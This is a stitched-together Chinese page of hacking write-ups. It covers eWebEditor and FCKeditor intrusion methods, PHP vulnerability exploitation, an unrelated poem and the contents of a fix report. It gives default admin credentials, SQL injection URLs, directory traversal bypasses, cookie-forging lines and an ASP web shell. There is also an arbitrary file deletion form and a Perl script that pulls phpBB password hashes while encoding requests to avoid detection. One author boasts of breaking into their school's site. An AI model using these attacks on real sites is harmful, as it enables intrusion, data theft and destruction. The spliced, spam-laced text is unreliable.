ewebeditor漏洞利用总结

第一篇：ewebeditor漏洞利用总结

ewebeditor漏洞利用总结

先从最基本的记录起！通常入侵ewebeditor编辑器的步骤如下:

1、首先访问默认管理页看是否存在。

默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp(各种语言的大家自己改后缀，本文就以asp来进行说明，下面不再细说了！)

2、默认管理帐号密码！

默认管理页存在！我们就用帐号密码登陆！默认帐号密码为: admin admin888！常用的密码还有admin admin999 admin1 admin000 之类的。

3、默认数据库地址。

如果密码不是默认的。我们就访问是不是默认数据库！尝试下载数据库得到管理员密码！管理员的帐号密码，都在eWebEditor_System表段里，sys_UserName Sys_Userpass 都是md5加密的。得到了加密密码。可以去！修改红色部分的路径，然后自动上传.cer 文件！漏洞原因是因为sStyleName变量直接从style中读取，并没有过滤，所以可以包含任意字符！用select在ewebeditor_style表中查找s_name为sStyleName的记录，找不到就提示出错！在sStyleName变量中用union来构造记录，我们可以在sAllowExt中加入“|cer”、“|asa”等！

另外还有一些版本的ewebeditor的upload.asp文件存在注入漏洞！贴几个注入用的url！信息错误则返回脚本出错的提示，在浏览器左下角！具体利用如下:

ewebeditor/Upload.asp?type=FILE&style=standard_coolblue1'and%20(select%20top%201%20asc(mid(sys_userpass,15,1))%20from%20ewebeditor_system%20)>98%20and%20'1'='1

注意修改红色部分的字段名、位数、ascii码的值！

7、目录遍历漏洞！

这里大概说一下！目录遍历漏洞基本存在于ewebeditor/admin_uploadfile.asp 高版本的是ewebeditor/admin/upload.asp 文件！这个文件有的不需要登陆验证，有些需要！很多有经验的管理员会把编辑器的目录设置为只读权限,不可修改！这种情况下，唯一可以利用的也就是利用遍历目录功能查看网站文件，比如数据库路径、后台地址、其他的上传地址、最直观的就是别人留下的小马等等！这些都自由发挥了！说下漏洞利用方法！

漏洞利用方式如下:在上传文件管理页面随便选择一个上传样式！比如ewebeditor/admin_uploadfile.asp?id=14 在id后面添加&dir=../..类似如下:webeditor/admin_uploadfile.asp?id=14&dir=../../../../data/ 可以看到网站数据库的路径！

另外一个遍历目录的漏洞文件是 ewebeditor/asp/browse.asp

漏洞代码为：

Function GetList()

Dim s_List, s_Url

s_List = “"

Dim oFSO, oUploadFolder, oUploadFiles, oUploadFile, sFileName

'Response.Write sCurrDir

'On Error Resume Next

Set oFSO = Server.CreateObject(”Scripting.FileSystemObject“)

Set oUploadFolder = oFSO.GetFolder(Server.Mappath(sCurrDir))

'注意一下sCurrDir变量,这个值等下我们可以用到

If Err.Number>0 Then

s_List = ”“

Exit Function

End If

If sDir <> ”“ Then

If InstrRev(sDir, ”/“)> 1 Then

s_Url= Left(sDir, InstrRev(sDir, ”/“)-1)

Else

s_Url = ”“

End If

s_List = s_List & ”“ & _

”“ & _

”..“ & _

” “ & _

”“

End If

'Response.Write sDir&”!“&s_List

Dim oSubFolder

For Each oSubFolder In oUploadFolder.SubFolders

'Response.Write oUploadFolder.SubFolders

If sDir = ”“ Then

s_Url = oSubFolder.Name

Else

s_Url = sDir & ”/“ & oSubFolder.Name

End If

s_List = s_List & ”“ & _

”“ & _

”“ & oSubFolder.Name & ”“ & _

” “ & _

”“

'Response.Write s_List

Set oUploadFiles = oUploadFolder.Files

For Each oUploadFile In oUploadFiles

'Response.Write oUploadFile.Name

sFileName = oUploadFile.Name

If CheckValidExt(sFileName)= True Then

'这行让人有点郁闷,检测了所有允许的文件后缀,如不允许就无法列出,不然就不只列出目录名和图片文件了

If sDir = ”“ Then

s_Url = sContentpath & sFileName

Else

s_Url = sContentpath & sDir & ”/“ & sFileName

End If

s_List = s_List & ”“ & _

”“ & FileName2pic(sFileName)& ”“ & _

”“ & sFileName & ”“ & _

”“ & GetSizeUnit(oUploadFile.size)& ”“ & _

”“

End If

Set oUploadFolder = Nothing

Set oUploadFiles = Nothing

'Response.Write Server.HTMLEncode(s_List)&”!“&s_Url

If sDir = ”“ Then

s_Url = ”“

's_Url = ”/“

Else

s_Url = ”/“ & sDir & ”“

's_Url = ”/“ & sDir & ”/“

End If

s_List = s_List & ”“

s_List = HTML2JS(s_List)

'Response.Write Server.HTMLEncode(s_List)&”!“&s_Url

s_List = ”parent.setDirList(“"” & s_List & “"”, “"” & s_Url & “"”)“

GetList = s_List

End Function

'如果没有下面这步检测的话,应该就可以列出目录中所有的文件了,有点郁闷..现在只能列出允许后缀的文件和目录名

Function CheckValidExt(s_FileName)

If sAllowExt = ”“ Then

CheckValidExt = True

Exit Function

End If

Dim i, aExt, sExt

sExt = LCase(Mid(s_FileName, InStrRev(s_FileName, ”.“)+ 1))

CheckValidExt = False

aExt = Split(LCase(sAllowExt), ”|“)

For i = 0 To UBound(aExt)

If aExt(i)= sExt Then

CheckValidExt = True

Exit Function

End If

End Function

'我们顺着代码往下找,发现sCurrDir的值是通过下面的值得到的

Sub Initparam()

sType = UCase(Trim(Request.QueryString(”type“)))

sStyleName = Trim(Request.QueryString(”style“))

Dim i, aStyleConfig, bValidStyle

bValidStyle = False

For i = 1 To Ubound(aStyle)

aStyleConfig = Split(aStyle(i), ”|||“)

If Lcase(sStyleName)= Lcase(aStyleConfig(0))Then

bValidStyle = True

Exit For

End If

If bValidStyle = False Then

OutScript(”alert('Invalid Style.')“)

End If

sBaseUrl = aStyleConfig(19)

'nAllowBrowse = CLng(aStyleConfig(43))

nAllowBrowse =

1If nAllowBrowse <> 1 Then

OutScript(”alert('Do not allow browse!')“)

End If

sUploadDir = aStyleConfig(3)

If Left(sUploadDir, 1)<> ”/“ Then

Select Case sType

Case ”REMOTE“

sUploadDir = ”../../“ & sUploadDir & ”Image/“

Case ”FILE“

sUploadDir = ”../../“ & sUploadDir & ”Other/“

Case ”MEDIA“

sUploadDir = ”../../“ & sUploadDir & ”Media/“

Case ”FLASH“

sUploadDir = ”../../“ & sUploadDir & ”Flash/“

Case Else

sUploadDir = ”../../“ & sUploadDir & ”Image/“

End Select

End If

'sUploadDir =sUploadDir &”/“

Select Case sBaseUrl

Case ”0“

'sContentpath = aStyleConfig(23)

Select Case sType

Case ”REMOTE“

sContentpath = ”../“ & aStyleConfig(3)& ”Image/“

Case ”FILE“

sContentpath = ”../“ & aStyleConfig(3)& ”Other/“

Case ”MEDIA“

sContentpath = ”../“ & aStyleConfig(3)& ”Media/“

Case ”FLASH“

sContentpath = ”../“ & aStyleConfig(3)& ”Flash/“

Case Else

sContentpath = ”../“ & aStyleConfig(3)& ”Image/“

End Select

Case ”1“

sContentpath = Relativepath2Rootpath(sUploadDir)

Case ”2“

sContentpath = Rootpath2Domainpath(Relativepath2Rootpath(sUploadDir))

End Select

Select Case sType

Case ”REMOTE“

sAllowExt = aStyleConfig(10)

Case ”FILE“

sAllowExt = aStyleConfig(6)

Case ”MEDIA“

sAllowExt = aStyleConfig(9)

Case ”FLASH“

sAllowExt = aStyleConfig(7)

Case Else

sAllowExt = aStyleConfig(8)

End Select

sCurrDir = sUploadDir '注意这里,这个是得到了配置的路径地址

sDir = Trim(Request(”dir“))'得到dir变量

sDir = Replace(sDir, ”“, ”/“)'对dir变量进行过滤

sDir = Replace(sDir, ”../“, ”“)

sDir = Replace(sDir, ”./“, ”“)

If sDir <> ”“ Then

If CheckValidDir(Server.Mappath(sUploadDir & sDir))= True Then

sCurrDir = sUploadDir & sDir & ”/“

'重点就在这里了,看到没有,当sUploadDir & sDir存在的时候,sCurrDir就为sUploadDir & sDir的值了

'虽然上面对sDir进行了过滤,不过我们完全可以跳过.具体利用下面的利用中给出

Else

sDir = ”“

End If

End Sub

利用方式如下:

http://site/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/admin

这样子就可以看到admin的内容了。构造特殊的dir绕过上面的验证!页面空白的时候查看源代码，就可以看到目录列表了！

8、session欺骗漏洞！

适用于一些设置不当的虚拟主机。当旁注得到一个webshell,而目标站存在ewebeditor却不能找到密码的时候可以尝试欺骗进入后台！顺序如下：

新建一个.asp文件，内容如下: <%Session(”eWebEditor_User“)= ”123132323“%> 然后访问这个文件，再访问ewebeditor/admin_default.asp！欺骗进入后台！不过很老了！

9、后台跳过认证漏洞！

访问后台登陆页面！随便输入帐号密码，返回错误！然后清空浏览器，在地址栏输入

javascript:alert(document.cookie=”adminuser=“+escape(”admin“));

javascript:alert(document.cookie=”adminpass=“+escape(”admin“));

javascript:alert(document.cookie=”admindj=“+escape(”1“));

然后再清空地址栏，在路径里输入后台登陆后的页面，比如: admin_default.asp admin/default.asp 等。直接进入后台，利用方式见上文！

10、利用远程上传功能！

比如s_full样式就存在这个功能，打开编辑页面，然后图片，选择输入url 比如:http://site.com/1.gif.asp!然后选择上传远程文件！自动就把1.gif.asp 保存在上传目录内！注:网上的东西大部分传来传去，这个办法愚弄自己还成！文件的确显示后缀为.asp 但是不能访问，因为收集过来的时候自动截止在1.gif了所以后面的.asp等于没有！而且gif的内容就是我们这个url的路径！呵呵，后来又看到一个利用方式！是利用远程搜集的时候执行,我们文件的代码生成另外的小马！

利用代码如下:

首先建立1.gif.asp 代码如下

Set fs = CreateObject(”Scripting.FileSystemObject“)

Set MyTextStream=fs.OpenTextFile(server.Mappath(”akteam.asp“),1,false,0)

Thetext=MyTextStream.ReadAll

response.write thetext

在我们的1.gif.asp的同目录下建立一个akteam.asp文件，内容就是我们的小马：

<%on error resume next%>

<%ofso=”scripting.filesystemobject“%>

<%set fso=server.createobject(ofso)%>

<%path=request(”path“)%>

<%if path<>”“ then%>

<%data=request(”dama“)%>

<%set dama=fso.createtextfile(path,true)%>

<%dama.write data%>

<%if err=0 then%>

<%=”success“%>

<%else%>

<%=”false“%>

<%end if%>

<%err.clear%>

<%end if%>

<%dama.close%>

<%set dama=nothing%>

<%set fos=nothing%>

<%=”

“%>

利用上面说的远程上传的方式！可以得到webshell！成功率取决于，虚拟主机的安全设置！

11、任意文件删除漏洞！

此漏洞存在于ExampleNewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入！看代码

' 把带”|“的字符串转为数组

Dim aSavepathFileName

aSavepathFileName = Split(sSavepathFileName, ”|“)

' 删除新闻相关的文件，从文件夹中

Dim i

For i = 0 To UBound(aSavepathFileName)

' 按路径文件名删除文件

Call DoDelFile(aSavepathFileName(i))

而aSavepathFileName是前面从数据库取出来的：

sSavepathFileName = oRs(”D_SavepathFileName“)

看看D_SavepathFileName是怎么添加到数据库里的，在addsave.asp(modifysave.asp)里：sSavepathFileName = GetSafeStr(Request.Form(”d_savepathfilename“))

...oRs(”D_SavepathFileName“)= sSavepathFileName

居然过滤了，是GetSafeStr函数，再看看这个函数，在Startup.asp里：

Function GetSafeStr(str)

GetSafeStr = Replace(Replace(Replace(Trim(str), ”'“, ”“), Chr(34), ”“), ”;“, ”“)

End Function

既然路径没有过滤，那就可以直接定义了，构造一个提交页面，其中d_savepathfilename自己任意赋值(要删除多个文件，用|隔开即可)。试试../../eWebEditor.asp，提交后删除该新闻，于是主目录下的eWebEditor.asp不见了！漏洞利用:

eWebEditor删除文件 byldjun(>新闻列表%20|%20增加新闻增加新闻http://127.0.0.1/editor/Example/NewsSystem/addsave.asp”method=“post” name=“myform”><input type=hidden name=d_originalfilename><input type=hidden name=d_savefilename><table cellspacing=3 align=center><tr><td>要删的文件(相对路径就可以了)：</td><td><input type=“text” name=“d_savepathfilename” value=“" size=”90“></td></tr><tr><td>新闻标题(随便填)：</td><td><input type=”text“ name=”d_title“ value=”“ size=”90“></td></tr><tr><td>标题图片：</td><td><select name=”d_picture“ size=1><option value=''>无</option></select>当编辑区有插入图片时，将自动填充此下拉框</td></tr><tr><td>新闻内容(随便填)：</td><td><textarea name=”d_content“></textarea></td></tr></table><input type=submit name=btnSubmit value=” 提交 “><input type=reset name=btnReset value=” 重填 “></form></BODY></HTML>删除文件漏洞一般是配合其他漏洞使用的，比如目录遍历<a href='list.asp'>中的list.asp地址要修改<a href='add.asp'>中的add.asp地址要修改<form action=”http://127.0.0.1/editor/Example/NewsSystem/addsave.asp“(http://127.0.0.1/editor/Example/NewsSystem/addsave.asp地址要修改)另外一个简单利用方式：<form action=”http://www.xiexiebang.com/editor/example/newssystem/addsave.asp“ method=”post“><input type=hidden name=d_originalfilename value=”x“><input type=hidden name=d_savefilename value=”x“>要删除的文件（相对路径，多个文件用“|”隔开） <input type=text name=d_savepathfilename><input type=hidden name=”d_title“ value=”x“><input type=hidden name=”d_picture“ value=”x“><textarea name=”d_content“>x</textarea><input type=submit name=btnSubmit value=”submit"></form>然后得到返回的新闻ID再提交：http://www.xiexiebang.com/editor/example/newssystem/delete.asp?id=[id]有几个版本的ewebeditor 上传类型是在 security.asp 文件控制的！直接删除该文件可以上传任意webshell！12、其他!其他说点什么呢！以上的办法都是本人经验和网上搜集！暂时就想到这些了,以后想到了再补全！说说aspx php jsp版本的利用吧！ASpX版：受影响文件：eWebEditorNet/upload.aspx利用方法：添好本地的cer的Shell文件。在浏览器地址栏输入javascript:lbtnUpload.click();就能得到shell。嘿嘿....绕过了限制......成功的上传了ASpX文件....文件默认的上传后保存的地址是eWebEditorNet/UploadFile/现在来看看是否上传成功.....pHp版本：php版本和asp版本利用方式类似！不过php权限较高，不多废话了!jsp版本：网上有很多jsp的版本，根本没有对上传文件类型进行检测！需要注意的是jsp版本的没有上传按钮！直接选择文件，回车就可以提交了！<h2><a name="2" >第二篇：Fckeditor漏洞利用总结</a></h2>Fckeditor漏洞利用总结查看编辑器版本FCKeditor/_whatsnew.html—————————————————————————————————————————————————————————————2.Version 2.2 版本Apache+linux 环境下在上传文件后面加个.突破！测试通过。—————————————————————————————————————————————————————————————3.Version <=2.4.2 For php 在处理pHp 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。<form id=“frmUpload” enctype=“multipart/form-data”action=“http://FCKeditor/editor/filemanager/upload/test.htmlFCKeditor/editor/filemanager/connectors/test.htmlFCKeditor/editor/filemanager/connectors/uploadtest.html—————————————————————————————————————————————————————————————7.常用上传地址FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.aspFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.xiexiebang.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php(ver:2.6.3 测试通过)JSp 版：FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp注意红色部分修改为FCKeditor 实际使用的脚本语言，蓝色部分可以自定义文件夹名称也可以利用../..目录遍历，紫色部分为实际网站地址。—————————————————————————————————————————————————————————————8.其他上传地址FCKeditor/_samples/default.htmlFCKeditor/_samples/asp/sample01.aspFCKeditor/_samples/asp/sample02.aspFCKeditor/_samples/asp/sample03.aspFCKeditor/_samples/asp/sample04.asp一般很多站点都已删除_samples 目录，可以试试。FCKeditor/editor/fckeditor.html 不可以上传文件，可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。—————————————————————————————————————————————————————————————9.列目录漏洞也可助找上传地址Version 2.4.1 测试通过修改CurrentFolder 参数使用../../来进入不同的目录/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp根据返回的XML 信息可以查看网站所有的目录。FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F也可以直接浏览盘符：JSp 版本：FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F—————————————————————————————————————————————————————————————10.爆路径漏洞FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp—————————————————————————————————————————————————————————————11.FCKeditor 被动限制策略所导致的过滤不严问题影响版本: FCKeditor x.x <= FCKeditor v2.4.3脆弱描述：FCKeditor v2.4.3 中File 类别默认拒绝上传类型：html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtmFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilepath = $sServerDir.$sFileName，而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!而在apache 下，因为”Apache 文件名解析缺陷漏洞"也可以利用之，另建议其他上传漏洞中定义TYpE 变量时使用File 类别来上传文件,根据FCKeditor 的代码，其限制最为狭隘。在上传时遇见可直接上传脚本文件固然很好，但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过，也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!—————————————————————————————————————————————————————————————12.最古老的漏洞，Type文件没有限制！我接触到的第一个fckeditor漏洞了。版本不详，应该很古老了，因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹，一个新类型，没有任何限制，可以上传任意脚本！—————————————————————————————————————————————————————————————以上方法都是网上收集和在平时渗透中所总结的经验，可能有些有遗漏，当再想起的时候再补充，也有自己没发现的就要靠各位大侠分享学习了!<h2><a name="3" >第三篇：漏洞现代诗歌</a></h2>闪电把漆黑的天幕撕开一条漏洞瞬间照亮了前方的路雷响了，雨来了淹没了蝉鸣，蛙声我仍然站在暴雨中是期待还是等待没有什么目标只有让闪电照耀让暴雨洗涤沾满身驱的污垢和疲惫不堪的肢体我也记不清闪电划过多少次雷声响过多少回就好象数不清这生有多少个漏洞又失去多少个可以拥有的机遇上千个电话号码有几个在你危难时可以伸手相助多少人鞍前马后有几个能和你走到最后春暖花开还诉说着情深似海冬天一到便无影无踪也许上苍给予这些眷顾是你生命中注定的磨难只能在这时才清醒被雨浇透的轻松总是在纠结过去了的往事一个丢失就成为一个漏洞一个失败就铸成终身憾事用时间填补那些漏洞用生命去等待另一道闪电照亮百孔千疮的灵魂这时才感到命运中的顽强是弥补这些漏洞的良药在暴风雨中冲刷在等待中找准方向迎接一个崭新的未来<h2><a name="4" >第四篇：PHP网站漏洞的相关总结</a></h2>PHP网站漏洞的相关总结NB联盟-zwell 从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在很严重的安全问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧.我对目前常见的PHP漏洞做了一下总结,大致分为以下几种:包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于COOKIE欺骗等一部分通用的技术就不在这里讨论了,这些资料网上也很多.那么,我们就一个一个来分析一下怎样利用这些漏洞吧!首先,我们来讨论包含文件漏洞.这个漏洞应该说是PHP独有的吧.这是由于不充分处理外部提供的恶意数据,从而导致远程攻击者可以利用这些漏洞以WEB进程权限在系统上执行任意命令.我们来看一个例子:假设在a.php中有这样一句代码: <?php include($include.“/xxx.php”);?> 在这段代码中,$include一般是一个已经设置好的路径,但是我们可以通过自己构造一个路径来达到攻击的目的.比方说我们提交:a.php?include=http://web/b.php,这个web是我们用做攻击的空间,当然,b.php也就是我们用来攻击的代码了.我们可以在b.php中写入类似于:passthru(“/bin/ls /etc”);的代码.这样,就可以执行一些有目的的攻击了.(注:web服务器应该不能执行php代码,不然就出问题了.相关详情可以去看<<如何对PHP程序中的常见漏洞进行攻击>>).在这个漏洞方面,出状况的很多,比方说:PayPal Store Front, HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.接着,我们再来看一下脚本命令执行漏洞.这是由于对用户提交的URI参数缺少充分过滤，提交包含恶意HTML代码的数据，可导致触发跨站脚本攻击，可能获得目标用户的敏感信息。我们也举个例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php页面对PHPSESSID缺少充分的过滤,我们可以通过这样的代码来达到攻击的目的: http://web/index.php?PHPSESSID=“><script>...</script>在script里面我们可以构造函数来获得用户的一些敏感信息.在这个漏洞方面相对要少一点,除了PHP Transparent之外还有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.再然后,我们就来看看文件泄露漏洞了.这种漏洞是由于对用户提交参数缺少充分过滤，远程攻击者可以利用它进行目录遍历攻击以及获取一些敏感信息。我们拿最近发现的phpMyAdmin来做例子.在phpMyAdmin中,export.php页面没有对伟创电脑维修用户提交的'what'参数进行充分过滤,远程攻击者提交包含多个'../'字符的数据，便可绕过WEB ROOT限制，以WEB权限查看系统上的任意文件信息。比方说打入这样一个地址:export.php?what=../../../../../../etc/passwd%00 就可以达到文件泄露的目的了.在这方面相对多一点,有:myPHPNuke,McNews等等.最后,我们又要回到最兴奋的地方了.想想我们平时在asp页面中用SQL注入有多么爽,以前还要手动注入,一直到小竹悟出”SQL注入密笈“(嘿嘿),然后再开做出NBSI以后,我们NB联盟真是拉出一片天空.曾先后帮CSDN,大富翁论坛,中国频道等大型网站找出漏洞.(这些废话不多说了,有点跑题了...).还是言规正传,其实在asp中SQL的注入和php中的SQL注入大致相同,只不过稍微注意一下用的几个函数就好了.将asc改成ASCII,len改成LENGTH,其他函数基本不变了.其实大家看到PHP的SQL注入,是不是都会想到PHP-NUKE和PHPBB呢?不错,俗话说树大招分,像动网这样的论坛在asp界就该是漏洞这王了,这并不是说它的论坛安全太差,而是名气太响,别人用的多了,研究的人也就多了,发现的安全漏洞也就越多了.PHPBB也是一样的,现在很大一部分人用PHP做论坛的话,一般都是选择了PHPBB.它的漏桂林伟创电脑洞也是一直在出,从最早phpBB.com phpBB 1.4.0版本被人发现漏洞,到现在最近的phpBB 2.0.6版本的groupcp.php,以及之前发现的search.php,profile.php,viewtopic.php等等加起来,大概也有十来个样子吧.这也一直导致,一部分人在研究php漏洞的时候都会拿它做实验品,所谓百练成精嘛,相信以后的PHPBB会越来越好.好了,我们还是来分析一下漏洞产生的原因吧.拿viewtopic.php页面来说,由于在调用viewtopic.php时，直接从GET请求中获得”topic_id“并传递给SQL查询命令,而并没有进行一些过滤的处理,攻击者可以提交特殊的SQL字符串用于获得MD5密码，获得此密码信息可以用于自动登录或者进行暴力破解。(我想应该不会有人想去暴力破解吧,除非有特别重要的原因).先看一下相关源代码: # if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))# { # $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);# } # else if(isset($HTTP_GET_VARS['topic']))# { # $topic_id = intval($HTTP_GET_VARS['topic']);# } 从上面我们可以看出,如果提交的view=newest并且sid设置了值的话,执行的查询代码像下面的这个样子(如果你还没看过PHPBB源代码的话,建议你看了再对着这里来看,受影响系统为:phpBB 2.0.5和phpBB 2.0.4).# $sql = ”SELECT p.post_id # FROM “.POSTS_TABLE.” p, “.SESSIONS_TABLE.” s, “.USERS_TABLE.” u # WHERE s.session_id = '$session_id' # AND u.user_id = s.session_user_id # AND p.topic_id = $topic_id # AND p.post_time >= u.user_lastvisit # ORDER BY p.post_time ASC # LIMIT 1“;Rick提供了下面的这断测试代码: use IO::Socket;$remote = shift || 'localhost';$view_topic = shift || '/phpBB2/viewtopic.php';$uid = shift || 2;$port = 80;$dbtype = 'mysql4';# mysql4 or pgsql print ”Trying to get password hash for uid $uid server $remote dbtype: $dbtypen“;$p = ”“;for($index=1;$index<=32;$index++){ $socket = IO::Socket::INET->new(PeerAddr => $remote, PeerPort => $port, Proto => ”tcp“, Type => SOCK_STREAM)or die ”Couldnt connect to $remote:$port : $@n“;$str = ”GET $view_topic“.”?sid=1&topic_id=-1“.random_encode(make_dbsql()).”&view=newest“.” HTTP/1.0nn“;print $socket $str;print $socket ”Cookie: phpBB2mysql_sid=1n“;# replace this for pgsql or remove it print $socket ”Host: $remotenn“;while($answer = <$socket>){ if($answer =~ /location:.*x23(d+)/)# Matches the location: viewtopic.php?p=<num>#<num> { $p.= chr($1);} } close($socket);} print ”nMD5 Hash for uid $uid is $pn“;# random encode str.helps avoid detection sub random_encode { $str = shift;$ret = ”“;for($i=0;$i<length($str);$i++){ $c = substr($str,$i,1);$j = rand length($str)* 1000;if(int($j)% 2 || $c eq ' '){ $ret.= ”%“.sprintf(”%x“,ord($c));} else { $ret.= $c;} } return $ret;} sub make_dbsql { if($dbtype eq 'mysql4'){ return ” union select ord(substring(user_password,“.$index.”,1))from phpbb_users where user_id=$uid/*“;} elsif($dbtype eq 'pgsql'){ return ”;select ascii(substring(user_password from $index for 1))as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false“;} else { return ”";} } 这断代码,我就不多做解释了.作用是获得HASH值.看到这里,大家可能有点疑问,为什么我前面讲的那些改的函数怎么没有用到,我讲出来不怕大家笑话:其实网上很多站点有些页面的查询语句看起来会是这样: display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc 不要笑,这是真的,我还靠这个进过几个大型网站.至于哪一些,不好讲出来,不过我们学校的网站,我就是靠这个进后台的(希望学校网络中心的看不到这篇文章,^_^).把前面那函数用上吧.不然你只有改人家的密码了哦！!差点忘了一点,在SQL注入的时候,PHP与ASP有所不同,mysql对sql语句的运用没有mssql灵活,因此,很多在mssql上可以用的查询语句在mysql数据库中都不能奏效了.一般我们常见的注入语句像这样:aaa.php?id=a' into outfile 'pass.txt或是aaa.php?id=a' into outfile 'pass.txt' /*再进一步可以改成:aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt 这样可以将数据库数据导出为文件,然后可以查看.或是这样:mode=',user_level='4 这个语句一般用在修改资料时,假设页面存在漏洞的话,就可以达到提升权限的做用.其它的如' OR 1=1--或者:1' or 1='1则跟asp差不多.这里不多讲了.在php里面,SQL注入看来还是漏洞之首啊,有太多的页面存在这个问题了.其实大家可以看出来,上面那些分类归根结底只有一个原因:提交参数没过滤或是过滤不够严谨.黑客防线向来有攻有守.这里,就大致讲一下防范的方法吧.首先,我个人认为最重要的一点是将magic_quotes_gpc高为ON,它的作用是将单引号,双引号,反斜线,和空字符转换为含有反斜线的字符,如select * from admin where username='$username' and password='$password'语句,攻击者想用1' or 1='1跳过验证,但是,那些字符串将被转换成这样:select * from admin where username='a' and password='1' or 1='1'从而达到阻止注入的目的,事实也就是自动进行了addslashes()操作.再不行的话,自己定义函数处理吧.现在看来,那些搞PHP注入的人也比较郁闷,因为myslq4以下版本不支持子语句,而新版本的mysql又会将magic_quotes_gpc选项默认为开.解决包含文件漏洞用的方法就是:要求程序员包含文件里的参数尽量不要使用变量，如果使用变量，就一定要严格检查要包含的文件名，绝对不能由伟创电脑维修用户任意指定,建议设global_variables为off。如前面文件打开中限制PHP操作路径是一个必要的选项。另外，如非特殊需要，一定要关闭PHP的远程文件打开功能。修改php.ini文件：allow_url_fopen = Off(注:参见<>).还有一点我觉得很多网站都会有这个问题,就是没有关错误显示.轻一看可能没什么,但是一些盯了很久(用词有点不对哦)的人就可以通过错误提示来获得如数据库信息,网页文件物理路径等等.以上都是我个人的一些观点,如果你有什么看法,可以与我们联系,大家在一起讨论吧。<h2><a name="5" >第五篇：javaWeb安全验证漏洞修复总结</a></h2>EMA服务管理平台二期扩容安全验收漏洞修复总结2011年5月中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结目录 2 WEB安全介绍..........................................................................................................................1 SQL注入、盲注.......................................................................................................................1 2.1 SQL注入、盲注概述.................................................................................................................1 2.2 2.4 3 安全风险及原因...................................................................................................................2 应用程序解决方案...............................................................................................................4 2.3 APPSCAN扫描建议......................................................................................................................2会话标识未更新.......................................................................................................................7 3.1 3.2 3.4 会话标识未更新概述...........................................................................................................7 安全风险及原因分析...........................................................................................................8 应用程序解决方案...............................................................................................................8 3.3 APPSCAN扫描建议......................................................................................................................8 已解密登录请求.......................................................................................................................9 4.1 4.2 4.4 已解密登录请求概述...........................................................................................................9 安全风险及原因分析...........................................................................................................9 应用程序解决方案...............................................................................................................9 4.3 APPSCAN扫描建议......................................................................................................................9 跨站点请求伪造.....................................................................................................................11 5.1 5.2 5.4 跨站点请求伪造概述.........................................................................................................11 安全风险及原因分析.........................................................................................................12 应用程序解决方案.............................................................................................................13 5.3 APPSCAN扫描建议....................................................................................................................13 不充分账户封锁.....................................................................................................................13 6.1 6.2 6.4 不充分账户封锁概述.........................................................................................................13 安全风险及原因分析.........................................................................................................13 应用程序解决方案.............................................................................................................14 6.3 APPSCAN扫描建议....................................................................................................................14 启用不安全HTTP方法...........................................................................................................14 7.1 7.2 7.4 启用不安全HTTP方法概述...............................................................................................14 安全风险及原因分析.........................................................................................................15 应用程序解决方案.............................................................................................................15 7.3 APPSCAN扫描建议....................................................................................................................15 HTTP注释敏感信息...............................................................................................................16 8.1 HTTP注释敏感信息概述........................................................................................................16 8.2 8.4 安全风险及原因分析.........................................................................................................16 应用程序解决方案.............................................................................................................17 8.3 APPSCAN扫描建议....................................................................................................................16 发现电子邮件地址模式.........................................................................................................17中国电信EMA服务管理平台二期扩容安全验收漏洞修复总结9.1 9.2 9.4 10 发现电子邮件地址模式概述.............................................................................................17 安全风险及原因分析.........................................................................................................17 应用程序解决方案.............................................................................................................17 9.3 APPSCAN扫描建议....................................................................................................................17通过框架钓鱼.........................................................................................................................20通过框架钓鱼概述.............................................................................................................20 安全风险及原因分析.........................................................................................................20 APPSCAN扫描建议...............................................................................................................21 应用程序解决方案.............................................................................................................23 10.1 10.2 10.3 10.4 11 检查到文件替代版本.............................................................................................................25检查到文件替代版本概述.................................................................................................25 安全风险及原因分析.........................................................................................................26 APPSCAN扫描建议...............................................................................................................26 